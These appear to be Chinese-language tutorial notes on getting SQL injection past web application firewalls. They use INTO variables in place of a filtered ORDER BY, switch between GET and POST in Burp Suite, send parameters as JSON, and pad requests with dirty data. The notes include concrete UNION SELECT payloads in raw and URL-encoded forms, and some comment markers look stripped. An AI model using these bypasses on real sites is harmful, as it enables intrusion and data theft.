order by绕过:当orderby 被过滤时,不能猜解字段数,可以用into代替
    例句: select * from users where id=1 into @a,@b,@c,@

    http相同参数请求绕过
    顾名思义,请求参数不变,改变请求方式,因为程序可能两种方式都接收,但只对一种拦截
    步骤:
    1.bp抓包改变请求方式,如果get转post,在报文主体下面加上请求的参数
    2.如果post改get,就在对应请求头加参数

    json绕过
    有些程序是 json 提交参数,程序也是 json 接收再拼接到 SQL 执行 json 格式通常不会被拦截。所以可以 绕过 waf
    步骤
    1.抓包,用post方法, Content-Type处改成 Content-Type:application/json //意思就是用json方式传参
    2.在报文下边加上json传参的数据
    image.png

    溢出绕过(应该也叫脏数据)
    注意,用post方式要进行url编码。
    id=1 and (select 1)=(select 0xA1000/!union//!select/1,user()
    编码后:
    1+and+(select+1)%3d(select+0xA    1000)/!union//!select /1,user()&submit=1